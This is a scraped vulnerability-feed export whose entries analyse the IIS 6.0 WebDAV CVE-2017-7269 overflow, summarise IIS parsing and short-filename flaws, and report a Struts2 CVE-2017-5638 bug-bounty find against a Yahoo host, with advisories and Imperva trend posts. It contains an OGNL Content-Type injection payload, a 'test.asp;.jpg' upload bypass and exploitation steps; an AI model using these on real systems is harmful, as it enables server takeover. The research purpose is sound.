"description": "## Vulnerability description:\n\n3 on 27 May, in Windows 2003 R2 using the [IIS 6.0 broke a 0Day vulnerability](<https://www.secpulse.com/archives/tag/IIS%206.0%20%E7%88%86%E5%87%BA%E4%BA%860Day%E6%BC%8F%E6%B4%9E>) \uff08CVE-2017-7269, the exploit PoC began to spread, but the worst part is this product has stopped updating. Online streaming of the poc the download link below.\n\ngithub address: <https://github.com/edwardz246003/IIS_exploit>\n\nThe combination of the above of POC, we exploit the Genesis and use of the process carried out a detailed analysis. In the analysis process, the poc of the exploit using techniques to feel stunning, multiple use of the same vulnerability function trigger, and the same vulnerability to the same period of the exploit code but for different purposes, and ultimately through the ROP way to bypass GS protection, the execution of shellcode is.\n\n## Debugging environment:\n\nVirtual machine install Windows Server 2003, Enterprise edition, installation of iss6. 0, set to allow the WebDAV extension. Using the debugger: windbg:6.7.0005.1\n\n! [](/Article/UploadPic/2017-4/20174610302295.jpg)\n\n! [](/Article/UploadPic/2017-4/20174610302613.jpg)\n\nRemote code execution results are as follows:\n\n! [](/Article/UploadPic/2017-4/20174610302246.jpg)\n\nFrom the above figure can be to exploit success after the network services permissions to execute arbitrary code.\n\n## Vulnerability analysis:\n\n### Vulnerability function\n\nThe vulnerability is located in the ScStoragePathFromUrl function,through the code can be seen in the function a tail call to the memcpy function, for copy destination address from the function parameters, and the parameters of the function as an upper layer function of the local variables, save in the upper layer function of stack space. In the call to memcpy, there is no judgment to be a copy of the source characters in length, thereby resulting in a stack overflow.\n\n! [](/Article/UploadPic/2017-4/20174610302711.jpg)\n\nBy the pseudo-code is more easily seen:\n\n! [](/Article/UploadPic/2017-4/20174610302937.jpg)\n\n! [](/Article/UploadPic/2017-4/20174610302665.jpg)\n\n## Exploit: the\n\nIn the POC, you can see the sent header contains two parts<>tag, which will make each of the above the body of the loop will run twice, in order to the following description convenience, we have these two header of the label portion are defined as HEAD_A with HEAD_B it.\n\n### The exploit process:\n\n1. In HrCheckIfHeader function, by using HEAD_A overflow, use HEAD_B is allocated to the heap space address.! [](/Article/UploadPic/2017-4/20174610302622.jpg)\n2. In HrGetLockIdForPath function, again through the use of HEAD_A overflow, so that the HEAD_B where the heap address assigned to the local object's virtual table pointer, in the object when calling the function, the control EIP.\n\n! [](/Article/UploadPic/2017-4/20174610302689.jpg)\n\n3. The final call to the IEcb class of the object offset 0x24 of the function pointer, the control EIP! [](/Article/UploadPic/2017-4/20174610303749.jpg)\n\nThe exploit lies mainly in HrCheckIfHeader function with the function HrGetLockIdForPath.\n\nFunction HrCheckIfHeader main function is for the user to pass to the Header header for validity determination. In the function HrCheckIfHeader through a while loop to traverse the user input of the Header in the header data.\n\n! [](/Article/UploadPic/2017-4/20174610303903.jpg)\n\nHrGetLockIdForPath main function is to transfer the path information for the locking operation. In HrGetLockIdForPath function, but also by the while loop to traverse the path information, also corresponding to the two call to vulnerability function.\n\n! [](/Article/UploadPic/2017-4/20174610303458.jpg)\n\n## Debugging process:\n\n### Two overflow control EIP\n\nTo this 4 a call to vulnerability function of the place are the following interrupts:\n\n\nbp httpext! CParseLockTokenHeader::HrGetLockIdForPath+0x114 \". echo HrGetLockIdForPath_FIRST\";\nbp httpext! CParseLockTokenHeader::HrGetLockIdForPath+0x14f \". echo HrGetLockIdForPath_SECOND\";\nbp httpext! HrCheckIfHeader+0x11f \". echo HrCheckIfHeader_FIRST\";\nbp httpext! HrCheckIfHeader+0x159 \". echo HrCheckIfHeader_SECOND\";\n! [13](/Article/UploadPic/2017-4/20174610304710.jpg)\n\nDebug the program, The total will be broken down 6 times, we to it 6 times off the point of the vulnerability function in use the time function to summarize:\n\nFor the first time:\n\nPause in HrCheckIfHeader _FIRST, the exploit has no effect\n\nThe second time:\n\nOff in the HrCheckIfHeader _SECOND, herein called the vulnerability function is intended to use HEAD_A label to overrun vulnerability function, the purpose is to use HEAD_A label in the stack address of the covered stack in the stack address, this heap address in subsequent use.\n\n**[1] [[2]](<85000_2.htm>) [next](<85000_2.htm>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-04-06T00:00:00", "type": "myhack58", "title": "CVE-2017-7269\u2014IIS 6.0 WebDAV remote code execution vulnerability analysis-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7269"], "modified": "2017-04-06T00:00:00", "id": "MYHACK58:62201785000", "href": "http://www.myhack58.com/Article/html/3/62/2017/85000.htm", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-11-28T18:40:15", "description": "! [](/Article/UploadPic/2018-11/20181128231052767. png) \nDo the spectators for a long time, found that there has been no better middleware vulnerability of the summary of the article, just recently doing this to learn, this only summarizes a small portion of the middleware common vulnerabilities for learning reference, follow-up will complement the other portion of the common vulnerabilities. If there is an error also please bigwigs correct me. \nA, IIS file parsing vulnerability \nIIS file parsing vulnerability exists in two versions, one is IIS6. 0 file parsing vulnerability, one is IIS7. 5 file parsing vulnerabilities, the IIS7. 5 file parsing vulnerability principles and IIS6. 0 similarly, because there is a logical problem, this is only for IIS6. 0 file parsing vulnerability analysis. In the Supplement will be on IIS7. 5 file parsing vulnerability differences section for additional instructions. \nA vulnerability principles \nIIS6. 0 in the treatment containing a special symbol of the path to the file occurs when the logical file name of the directory to test. asp, files in the directory will be used as an asp implementation; suffix. asp;. jpg, when the asp file is executed, the resulting file parsing vulnerability. \nII vulnerability presentation and the use of \nWhen the website upload point limit extension when IIS the main and asp mix, you can use file parsing vulnerability upload as test. asp;. jpg file, bypassing after the execution. As shown in Figure 1. 1 \n! [](/Article/UploadPic/2018-11/20181128231052271. png) \nFigure 1. 1 \nWhen allowed to create a new directory and not the directory name limit, you can use file parsing vulnerability new named test. asp folder, and in which the structure is required to perform the file iisstart. jpg be bypassed. As shown in Figure 1. 2 \n! [](/Article/UploadPic/2018-11/20181128231052184. png) \nFigure 1. 2 \n- Bug fixes \n1, the new catalog file name to be filtered, and do not allow New include. The folder even prohibit new directory \n2, limit upload file execute permission, not allowed to perform \n3, the filtering. asp/xm. jpg, etc., in the httpd. ini was added to the filtered rules, this method of network solution, but in the Server 2003 does not search the files. \n4, upgrade the IIS version \nIV Supplement \nIIS6. 0 parsing vulnerability also exists in IIS 5. x version, and IIS7. 5 deformity parsing vulnerability attack method is also applicable to IIS7. 0 and Nginx \nIIS7.5\u6587\u4ef6\u89e3\u6790\u6f0f\u6d1e\u51fa\u73b0\u662f\u56e0\u4e3aurl\u4e2d\u53ea\u8981\u770b\u5230\u540e\u7f00.php regardless of the presence or absence are handed over to the php processing, and php and turned on by default\u201ccgi. fix_pathinfo\u201d,the file path to sort from back to front is determined whether the presence, not the presence of the deletion, the presence of it as a php file to perform it. \n\nSecond, the IIS command execution vulnerability \nIIS6. 0 command execution vulnerability number CVE-2017-7269, in the open WebDav service in the case there may be a remote execution vulnerability. \nA vulnerability principles \nIn IIS6. 0 processing PROPFIND command when, due to the length of the url without the effective length of the control and inspection lead to the implementation of memcpy on a virtual path configuration when the trigger Stack Overflow, this vulnerability can lead to remote code execution. As shown in Figure 2. 1 \n! [](/Article/UploadPic/2018-11/20181128231052174. png) \nFigure 2. 1 \nII vulnerability presentation and the use of \nOn Github, an open source exp:https://github. com/edwardz246003/IIS_exploit \nModify the IP address not corresponding to the target address, as shown in Figure 2. 2 \n! [](/Article/UploadPic/2018-11/20181128231052963. png) \nFigure 2. 2 \nRun the script, the attack target machine. As shown in Figure 2. 3 \n! [](/Article/UploadPic/2018-11/20181128231053587. png) \nFigure 2. 3 \n- Bug fixes \nWill IIS Manager, web service extensions, webDAV is disabled, you can repair, after the repair then this script is run, it does not appear pop-UPS. As shown in Figure 2. 4 \n! [](/Article/UploadPic/2018-11/20181128231053940. png) \nFigure 2. 4 \nIV Supplement \nIf the pop-up calculator calc,and the permissions have been sufficient to complete getshell of the entire operation. \n\nThird, IIS short file name \nIIS short file name vulnerability, by IIS short file name of the mechanism, the violence include the short file name, try to guess the background address, sensitive documents and even directly download the corresponding file. But limited you can only guess the long file name before the 6-bit and the extension prior to 3 bits, while the need for IIS and. net two conditions are met. \nA vulnerability principles \nThe use of IIS short file name of the mechanism, that is, a compatible 16-bit MS-DOS program, Windows for a file name longer-compute a suffix after the file name length is greater than 9 files and folders generated corresponding to the windows 8.3 short file name. You can use this vulnerability to guess the solution of the background address, sensitive documents, etc. As shown in Figure 3. 1 \n! [](/Article/UploadPic/2018-11/20181128231053697. png) \nFigure 3. 1 \nII vulnerability presentation and the use of \nOn winserver2003 virtual machine, in the c:/Inetpub/wwwroot directory under the new comparative folder 12345678 and 123456789, comparative file aaaaaa. asp. On the host open the virtual machine IP URL below \nTry 10. 10. 10. 132/122~1**/a. asp and 10. 10. 10. 132/123~1/a. asp; to give a different result as shown in Figure 3. 2, Figure 3. 3. the \n! [](/Article/UploadPic/2018-11/20181128231053148. png) \nFigure 3. 2 \n! [](/Article/UploadPic/2018-11/20181128231053198. png) \nFigure 3. 3 \nThrough the above two figure we can see that, according to the return result can be different one by one guess the short file name. \nThen try again 10. 10. 10. 132/aaaaaa~1/a. asp\uff08guess no suffix, the normal return for the folder and 10. 10. 10. 132/aaaaaa~1/a. asp\uff08guess for the file. As shown in Figure 3. 4, Figure 3. 5\u3002 \n! [](/Article/UploadPic/2018-11/20181128231053399. png)\n\n**[1] [[2]](<92204_2.htm>) [[3]](<92204_3.htm>) [[4]](<92204_4.htm>) [next](<92204_2.htm>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-11-28T00:00:00", "type": "myhack58", "title": "Part of the middleware vulnerability summary-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7269"], "modified": "2018-11-28T00:00:00", "id": "MYHACK58:62201892204", "href": "http://www.myhack58.com/Article/html/3/62/2018/92204.htm", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-06-07T13:16:58", "description": "I always believe to share with people is a good trait, and I'm also from the vulnerability reward in the field of multi-bit security research experts learned a lot to make me last a lifetime things, so I decided in this article to share with you some of my recent little discovery, hope these things can help you Freebuf of friends early on their own vulnerability reward trip. \n! [](/Article/UploadPic/2017-6/201767192643555. png? www. myhack58. com) \nJust a few months ago, a security research expert in Apache Struts2, found a serious security vulnerability, CVE-2017-5638, probably some of you have heard of this thing. This is a remote code execution vulnerability, then Internet in a large number of Web applications are affected by this vulnerability. About three weeks later, researchers released the Struts2 exploit code. \nIn a dig before the Investigative process, I came across the following link: \nhttps://svdevems01.direct.gq1.yahoo.com/sm/login.jsp \nThis is Yahoo the a login page. \n! [](/Article/UploadPic/2017-6/201767192643648. png? www. myhack58. com) \nI have tried in this page find the vulnerability, but unfortunately I didn't find until I found the following nodes: \nhttps://svdevems01.direct.gq1.yahoo.com/sm/login/loginpagecontentgrabber.do \nNote: If you find a node address contains. action,. do or. go, then, this indicates that this Web application to run a Struts2 to. \nAs I said before, for the Struts2 vulnerability exploit code has been released, and this vulnerability using the process is also very simple. Although I know here there is vulnerability, but ready-made exploit code here does not work, so I feel may be a Web application firewall in the mischief, or that some of the things shield my attack. \nSince I was able to determine where there is indeed a vulnerability, so I couldn't stop. But if you want to submit a valid vulnerability, I have to provide a viable PoC to prove this vulnerability is valuable. After a period of research, I found an article tweet this article tweet describes how to pass a Payload to bypass the WAF and be successfully exploited this vulnerability. \nI the use of detection methods require the use of Content-Type HTTP header to send a specially crafted data packet, the header data as shown below: \nContent-Type:%{#context[\u2018com. opensymphony. xwork2. dispatcher. HttpServletResponse\u2019]. addHeader(\u2018X-Ack-Th3g3nt3lman-POC\u2019,4*4)}. multipart/form-data \nThis specially constructed request can not only make[the Web server](<http://www.myhack58.com/Article/sort099/sort0100/Article_100_1.htm>)to calculate the two multiplied by the number, and you can also request a[Web server](<http://www.myhack58.com/Article/sort099/sort0100/Article_100_1.htm>)for any other form of operation. In the above example, the request to calculate the value of 4 * 4, the server returns the result of 16, which means that this server is the presence of security vulnerabilities. \nAs shown in the following figure, the response data will contain the new header, i.e. X-Ack-Th3g3nt3lman-POC: 16 \n! [](/Article/UploadPic/2017-6/201767192643394. png? www. myhack58. com) \nThese have enough I'm through HackerOne to Yahoo to submit a vulnerability report, Yahoo skilled in the art after receiving the report within 30 minutes of the vulnerabilities were classified, and then promptly will be the presence of vulnerabilities the application offline to fix this issue, a few days later I received a Yahoo to provide me with the 5500 knife vulnerability bonus. \nIn fact, digging a hole is not difficult, as long as you are willing to spend time, willing to move the brain to think, I believe thousands of dollars of vulnerability bonuses to everyone or can be easily in the bag. Finally, I hope my these little can be found to everyone in the burrow in the process bring some inspiration. \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-06-07T00:00:00", "type": "myhack58", "title": "Burrow experience | to see how I find the Yahoo remote code execution vulnerability and get the 5500 knife bonus-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-06-07T00:00:00", "id": "MYHACK58:62201786819", "href": "http://www.myhack58.com/Article/html/3/62/2017/86819.htm", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-03-07T09:25:02", "description": "Recently, the national information security vulnerabilities library CNNVD received on the Apache Struts2 \uff08S2-045 remote code execution vulnerability CNNVD-201703-152 the case of the message send. Because the vulnerability affects a wide range of hazard level high, the national information security vulnerabilities library CNNVD for the tracking analysis, the situation is as follows: \nA, vulnerability introduction\nApache Struts is a United States Apache\uff08the Apache Software Foundation is responsible for the maintenance of an open source project, is used to create enterprise-class Java Web application open source MVC framework, mainly to provide two versions of the frame product: Struts 1 and Struts 2 of. \nApacheStruts 2.3.5 \u2013 2.3. 31 version and 2. 5 \u2013 2.5.10 version there is a remote code execution vulnerability CNNVD-201703-152, CVE-2017-5638 it. The vulnerability is due to the upload functionality of the exception handling function does not properly handle user input error information. Lead to a remote attacker by sending malicious packets that exploit the vulnerability in the affected on the server execute arbitrary commands. \nSecond, the vulnerability to hazards\nAn attacker can send malformed HTTP packet to exploit the vulnerability in the affected server to perform system commands, and further can completely control the server, causing a denial of service, data leakage, website creation tampering and other effects. Since the exploit without any pre-conditions such as open dmi, debug, and other functions, and enable any plugins, and therefore vulnerability to harm is more serious. \nThird, the repair measures\nCurrently, the Apache official has been directed to the vulnerabilities released a security announcement. Please the affected users to check whether or not affected by the vulnerability. \nSelf-examination manner\n\u7528\u6237 \u53ef \u67e5\u770b web \u76ee\u5f55 \u4e0b /WEB-INF/lib/ \u76ee\u5f55 \u4e0b \u7684 struts-core.x.x.jar file, if the version in Struts2. 3. 5 to Struts2. 3. 31 and Struts2. 5 to Struts2. 5. 10 between the presence of vulnerabilities. \nUpgrade repair\nAffected users can upgrade to version to Apache Struts 2.3.32 or Apache Struts 2.5.10.1 to eliminate the vulnerability. \nTemporary relief\nAs the user inconvenient to upgrade, may take the following temporary solution: \nl delete commons-fileupload-x. x. x. the jar file will cause the upload function is not available. \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-03-07T00:00:00", "type": "myhack58", "title": "About Apache Struts2\uff08S2-045\uff09vulnerability briefings-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-07T00:00:00", "id": "MYHACK58:62201784024", "href": "http://www.myhack58.com/Article/html/3/62/2017/84024.htm", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "impervablog": [{"lastseen": "2017-12-28T17:52:36", "description": "As a web application firewall provider, part of our job at Imperva is constantly monitoring new security vulnerabilities. To do this, we use internal software that collects information from various data sources such as vulnerability databases, newsletters, forums, social media and more, integrate it into a single repository, and assess each vulnerability\u2019s priority. Having this kind of data puts us in a unique position to provide analysis of all web application vulnerabilities throughout the year, view trends and notice significant changes in the security landscape.\n\nAs we did [last year](<https://www.imperva.com/blog/2016/12/state-web-applications-vulnerabilities-2016/>), before we enter 2018, we took a look back at 2017 to understand the changes and trends in web application security over the past year.\n\nThis year we registered a record high number of web application vulnerabilities including well-known categories like [cross-site scripting](<https://www.imperva.com/app-security/threatglossary/cross-site-scripting-xss/>), but also new categories such as insecure [deserialization](<https://www.owasp.org/index.php/Deserialization_Cheat_Sheet>). In addition, the number of internet of things (IoT) vulnerabilities continued to grow and severely impact the security landscape. WordPress and PHP each continued to \u201cdominate\u201d in terms of vulnerabilities published in the content management system and server side technologies respectively. [Apache Struts vulnerabilities](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>), although the framework is less popular in the market at large, had a huge effect and were claimed to be the root cause of one of the biggest security breaches in 2017.\n\n## 2017 Web Application Vulnerabilities Statistics\n\nOne of the first stats we review is quantity, meaning how many vulnerabilities were published in 2017 and how that number compares to previous years.\n\nFigure 1 shows the number of vulnerabilities on a monthly basis over the last two years. We can see that the overall number of new vulnerabilities in 2017 (14,082) increased significantly (212%) compared to 2016 (6,615). According to our data, more than 50% of web application vulnerabilities have a public exploit available to hackers. In addition, more than a third (36%) of web application vulnerabilities don\u2019t have an available solution, such as a software upgrade workaround or software patch.\n\nAs usual, cross-site scripting (Figure 2) vulnerabilities are the majority (8%) of 2017 web application vulnerabilities. In fact, their amount has doubled since 2016.\n\n_Figure 1: Number of web application vulnerabilities in 2016-2017_\n\n## OWASP Top 10 View\n\nThis year [OWASP released](<https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf>) their long awaited \u201cTop 10\u201d list, which included two new risks:\n\n### Insecure Deserialization\n\nSerialization is the process of translating data structures or object state into a format that can be stored (for example, in a file or memory buffer) or transmitted (for example, across a network connection link) and reconstructed later (deserialization). Serialization is widely used in RPC, HTTP, databases, etc.\n\nApplications and APIs may be vulnerable if they deserialize hostile or tampered objects supplied by an attacker without proper sanitization. Therefore, we thought it would be interesting to view the security vulnerabilities in light of these changes.\n\n_Figure 2: Number and type of OWASP Top 10 vulnerabilities 2014-2017_\n\nThe amount of deserialization vulnerabilities from 2016-2017 (Figure 2) increased substantially from previous years which may explain how they \u201cearned\u201d their spot in the new OWASP Top 10 list. Today, more and more applications and frameworks are using standard APIs to communicate. Some of these APIs take serialized objects and deserialize them in return, which can explain the growing trend of insecure deserialization vulnerabilities.\n\n### Insufficient Logging and Monitoring\n\nAttackers rely on the lack of monitoring and timely response to achieve their goals without being detected. We have not found any vulnerabilities published in 2017 that are directly related to this category. It will be interesting to monitor it and see if that will change next year.\n\n## The Rise of the (IoT) Machines\n\nNowadays nearly every aspect of our lives is connected to the internet and we can find smart devices everywhere\u2014in our home refrigerator, TV, lights, doors, locks and even the clothes we wear. These devices are designed to send and receive information and thus are usually connected to the internet at all times. In many cases the vendors of smart devices neglect to secure them properly or even \u201cbackdoor\u201d them on purpose in order to gain hidden access.\n\n \n_Figure 3: IoT vulnerabilities 2014-2017_\n\n2017 registered a record high of 104 IoT-related vulnerabilities (Figure 3), a huge increase relative to previous years. The rising trend in the amount of vulnerabilities can be associated with their increasing popularity in our modern lives and advances in IoT technology that make IoT devices cheaper and accessible to more people.\n\nOne of the most popular vulnerability types in IoT devices (35%) is using default or easy to guess credentials in order to gain access to the device and take control of it. Once the device is controlled by the attacker it can be used to mount any kind of attack. Earlier this year the well-known [Mirai malware used this kind of vulnerability](<https://www.incapsula.com/blog/malware-analysis-mirai-ddos-botnet.html>) (default credentials) to spread itself through the network. Once the malware gained access to the device, it turned it into a remote-controlled bot that was used as part of huge a DDoS attack.\n\n## Content Management Systems\n\nWhen analyzing content management system (CMS) frameworks, we decided to concentrate on the four leading platforms that account for [60% of the market share](<https://w3techs.com/technologies/overview/content_management/all>)\u2014WordPress, Joomla, Drupal and Magento.\n\n_Figure 4: Number of vulnerabilities by CMS platform 2016-2017_\n\n### WordPress\n\nAs suspected, WordPress vulnerabilities continue to be the lion\u2019s share of all CMS-related vulnerabilities. In fact, WordPress vulnerabilities (418) have increased by ~400% since 2016 (Figure 4).\n\nFurther analysis of WordPress vulnerabilities showed that 75% of the 2017 vulnerabilities originated from third-party vendor plug-ins (Figure 5).\n\n_Figure 5: WordPress third party vendor vulnerabilities in 2017_\n\nThe rise in the number of vulnerabilities can be explained by the growth of WordPress (Figure 6) and because [third party plug-in](<https://www.wpwhitesecurity.com/wordpress-security/statistics-highlight-main-source-wordpress-vulnerabilities/>) code is notoriously known for its bad security.\n\n**Year** | **Number of WordPress Plug-ins** \n---|--- \n**2015** | 41,347 \n**2016** | 48,044 \n**2017** | 53,357 \n \n_Figure 6: WordPress plug-in's trend_\n\n## Server-side Technologies\n\nPHP is still the most prevalent server-side language, therefore it\u2019s expected be associated with the highest number of vulnerabilities. In 2017, 44 vulnerabilities in PHP were published (Figure 7) which is a significant decrease (-143%) from the number of PHP vulnerabilities in 2016 (107) (see Figure 7). At the end of 2015, PHP released a major version, 7.0, after almost a year and half with no updates, which can explain the growth in the number of vulnerabilities in 2016. Last year PHP released a minor version, 7.1 (December 2016), with slight changes which can explain the decrease in the number of vulnerabilities in 2017.\n\n_Figure 7: Top server-side technology vulnerabilities 2014-2017_\n\n## The Year of Apache Struts\n\nAlthough 2017 listed fewer vulnerabilities in the Apache Struts framework (Figure 8), their impact was huge as some of them included unauthenticated [remote code execution](<https://www.imperva.com/blog/2017/01/remote-code-execution-rce-attacks-apache-struts/>) (RCE) which basically means that anyone can hack and take over the server, access private information and more.\n\n_Figure 8: Apache Struts and remote code execution vulnerabilities in 2014-2017_\n\nWe have previously blogged about this [specific vulnerability](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>) and [multiple other Apache Struts](<https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/>) vulnerabilities in detail. They\u2019re worth checking out if you haven\u2019t already.\n\n## Predictions Toward 2018\n\nAs a security vendor, we\u2019re often asked about our predictions. Here are a couple of possible vulnerabilities trends for 2018:\n\n * Cross-site scripting vulnerabilities will continue to lead mainly because of the rise of [cryptojacking](<https://www.wired.com/story/cryptojacking-cryptocurrency-mining-browser/>) and the increasing popularity of server-side technologies that utilize JavaScript (e.g., Node.JS).\n * More authentication-related vulnerabilities from the family of \u201cdefault/guessable credentials\u201d will be discovered (especially in IoT devices) and exploited in order to herd new botnets. These botnets can be used to mount any kind of large scale attacks\u2014DDoS, brute force and more.\n\n## How to Protect Your Apps and Data\n\nOne of the best solutions for protecting against web application vulnerabilities is to deploy a [web application firewall](<https://www.imperva.com/products/application-security/web-application-firewall-waf/>) (WAF). A WAF may be either on-premises, in the cloud or [a combination of both](<https://www.imperva.com/blog/2017/11/cloud-waf-versus-on-premises-waf/>) depending on your needs and infrastructure.\n\nAs organizations are moving more of their apps and data to the cloud, it\u2019s important to think through your security [requirements](<https://www.imperva.com/blog/2017/06/waf-requirements-and-deployment-options-for-the-cloud/>). A solution supported by a dedicated security team is an important requirement to add to your selection criteria. Dedicated security teams are able to push timely security updates to a WAF in order to properly defend your assets.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-12-28T17:20:47", "type": "impervablog", "title": "The State of Web Application Vulnerabilities in 2017", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-12-28T17:20:47", "id": "IMPERVABLOG:6BF557CA0830C9058E2409E8C914366C", "href": "https://www.imperva.com/blog/2017/12/the-state-of-web-application-vulnerabilities-in-2017/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-25T19:52:24", "description": "I recently took a step back to review all the content we shared in 2017 on the Imperva blog. We covered a broad range of topics including data security, cloud migration, application and API security, AI and machine learning, cybersecurity research, GDPR, insider threats and more. We were busy! Cybersecurity certainly held the world's attention in 2017.\n\nSeveral stories rose to the top as either most read by you, particularly relevant to today's cybersecurity industry or exceptionally newsworthy (and in some cases, all of the above). For an end-of-year reading shortlist, I've compiled our top 10 blog posts from 2017.\n\n## 1\\. What\u2019s Next for Ransomware: Data Corruption, Exfiltration and Disruption\n\nThe WannaCry ransomware attack caught everyone off guard, infecting more than 230,000 computers in 150 countries by encrypting data on networked machines and demanding payments in Bitcoin. We wrote about how to [protect against it](<https://www.imperva.com/blog/2017/05/protect-against-wannacry-with-deception-based-ransomware-detection/>), but our post on [what's next for ransomware](<https://www.imperva.com/blog/2017/05/whats-next-for-ransomware/>) garnered even more attention\u2014it was our most read post of the year.\n\n## 2\\. CVE-2017-5638: Remote Code Execution (RCE) Vulnerability in Apache Struts\n\nApache Struts made headlines all over the place in 2017. The [vulnerability we wrote about in March](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>) hit it big and just kept on going. 